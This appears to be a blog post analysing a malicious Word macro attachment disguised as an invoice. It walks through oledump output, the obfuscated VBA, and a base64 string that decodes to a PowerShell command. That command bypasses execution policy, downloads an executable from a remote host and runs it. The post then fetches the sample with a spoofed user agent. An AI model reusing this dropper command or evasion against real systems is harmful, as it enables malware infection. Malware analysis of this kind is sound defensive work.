Malware Must Die!

Everyone gets unwanted e-mails in his inbox and some are filtered by the spam filters or virus scanners, other get a way trough. My Spam filters are really good but this does not apply to malware mails and recently I got one. Usually I delete those and live goes on, but this time I was curious what this piece in my inbox would do.

Malware File

Attached to the email is a ZIP-File which pretend to be a invoice and contains a rechnung_20_Juli.docm
Ha - a malicous VBA Macro File. Usually those are just dropper for downloading the real malware.
It’s too dangerous to run this on my machine, no matter thats linux which is running.
For this I’m using a Fedora 24 Workstation LiveCD Image to work on, and deleting the Virtual Machine afterwards.


To extract and decompile VBA Code out of an Word Document I will use oledump. This helper tool was written by didier stevens

[liveuser@localhost]$ rechnung_20_Juli.docm

 A: word/vbaProject.bin
 A1:       112 '\x01CompObj'
 A2:        20 '\x01Ole'
 A3:        36 '\x02OlePres000'
 A4:       640 'PROJECT'
 A5:       122 'PROJECTwm'
 A6: M    1251 'VBA/ThisDocument'
 A7: M    7961 'VBA/TpJXPSnp'
 A8:      4921 'VBA/_VBA_PROJECT'
 A9:       907 'VBA/dir'
A10: m    1159 'VBA/elDSLrLD'
A11: M    7125 'VBA/iMbytqXR'
A12:        97 'elDSLrLD/\x01CompObj'
A13:       290 'elDSLrLD/\x03VBFrame'
A14:       367 'elDSLrLD/f'
A15:       728 'elDSLrLD/o'

The dump information shows Macro Code on the Positions A6, A7, A10 and A11, which I will extract to read the source code:

[liveuser@localhost]$ rechnung_20_Juli.docm -s A6 -v > ThisDocument
[liveuser@localhost]$ rechnung_20_Juli.docm -s A7 -v > TpJXPSnp
[liveuser@localhost]$ rechnung_20_Juli.docm -s A10 -v > elDSLrLD
[liveuser@localhost]$ rechnung_20_Juli.docm -s A11 -v > iMbytqXR

Code Analysis

I will start analyzing the ThisDocument where the initial call would be, and dig forwards in the code.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close()
End Sub
Private Sub BsOuIZuQ()
End Sub

Seems to me the functions and variables are obfuscated to hamper the analysis of the code, which not should stop us…
The document_close trigger will call another module in the document iMbytqXR.bLluwqOR. Let’s see further.

Attribute VB_Name = "iMbytqXR"
Sub bLluwqOR()
Dim rGCzJptK, OPTxrRXP, gYdJjNFA As String
Dim JHUkheaC, xQgSEvKG, aYXiHLPY As String
JHUkheaC = "           EAZAFM               "
xQgSEvKG = LTrim(JHUkheaC)
aYXiHLPY = RTrim(xQgSEvKG)

rGCzJptK = "           JQGAJH               "
Dim xYhxOvoH, PwwNFplv, dUOMcUeK As String
xYhxOvoH = "           ABIBZX               "
PwwNFplv = LTrim(xYhxOvoH)
dUOMcUeK = RTrim(PwwNFplv)

OPTxrRXP = LTrim(rGCzJptK)
Dim AkHiOlTA, belMUmqN, SoyCpogq As String
AkHiOlTA = "           SMODYQ               "
belMUmqN = LTrim(AkHiOlTA)
SoyCpogq = RTrim(belMUmqN)

gYdJjNFA = RTrim(OPTxrRXP)

There are a lot of code which does nothing, certainly a try to confuse us.
So there are some lines in this function which are interesting:

cSkUpwJi = elDSLrLD.AJkMVXXy + elDSLrLD.KCowABrm + elDSLrLD.gHUxCExw + elDSLrLD.rKGIXazg
gNGRdALo = elDSLrLD.NhazmwgJ + elDSLrLD.gaRqBeoE + elDSLrLD.vaeKdnlJ
Set mwpwegHX = CreateObject(gNGRdALo)
mwpwegHX.Run (R1OSe0au(cSkUpwJi)), 0

A glimpse on the first summary I created shows that elDSLrLD is a frame and not vba code, which cannot be read out of the box. On my Live Image of Fedora 24 Workstation is also LibreOffice Installed, which can open VBA Macro Files. I’m sure this piece of malware is prepared for Windows and for security reasons, macros are disabled by default in libreoffice. Should be safe to open this. I opened the Word Document and Exported the Frame over the “Tools - Macros Editor” into a readable xml Format.

The result shows, that the code tries to read properties from a userform interface object, like a text field.

<dlg:textfield dlg:style-id="0" dlg:id="AJkMVXXy" dlg:tab-index="0" dlg:left="6" dlg:top="13" dlg:width="0" dlg:height="10" dlg:tabstop="true" dlg:value="JWNPbVNQZUMlIC9yIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgQnlQYXNzIC1O"/>

Reconstructed out of the fields values, the string of cSkUpwJi shows


and seems to be a base64 encoded string:

[liveuser@localhost]$ echo "JWNPbVNQZUMlIC9yIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgQnlQYXNzIC1Ob1Byb2ZpbGUgLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL2pucmUucGxleGFjcnlsLmV1LzYwcy90aGVkb29ycy9icmVha29udGhyb3VnaC5waHAnLCclVE1QJVxHSkhqc2FUdWFzZC5leEUnKTtTdGFydCAnJVRNUCVcR0pIanNhVHVhc2QuZXhFJzsNCg==" | base64 -d

%cOmSPeC% /r powershell.exe -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('','%TMP%\GJHjsaTuasd.exE');Start '%TMP%\GJHjsaTuasd.exE';

Download the Malware

Yaay - A malware download address. No way I would not download that to analyze it further!

A traceroute of the IP Address shows a server in the ukraine.

But why it’s giving me a Bad Gateway? Have the Bad Boys already shutdown the link?
The other VBA Code Lines shows the construction of an statement to run download the malware bytes and run it afterwards.

[liveuser@localhost]$ curl -v
*   Trying
* Connected to ( port 80 (#0)
> GET /60s/thedoors/breakonthrough.php HTTP/1.1
> Host:
> User-Agent: curl/7.47.1
> Accept: */*
< HTTP/1.1 502 Bad Gateway
< Server: nginx/1.0.15
< Date: Wed, 27 Jul 2016 11:59:08 GMT
< Content-Type: text/html
< Content-Length: 173
< Connection: keep-alive
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
* Connection #0 to host left intact

Probably they are checking if really a powershell download request is incoming, so I will set my User Agent like the powershell haves: -

[liveuser@localhost]$ wget -O GJHjsaTuasd.exE --user-agent="-"
GJHjsaTuasd.exE               100%[<!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more--><!--more-->==>] 172.38K   387KB/s    in 0.4s    

2016-07-27 07:03:48 (387 KB/s) - ‘GJHjsaTuasd.exE’ saved [176520/176520]

The downloaded malware is 173K big and a PE32 executable (console) Intel 80386, for MS Windows.
Time to get radare started. Radare is a portable reversing framework that can disassemble (and assemble for) many different architectures.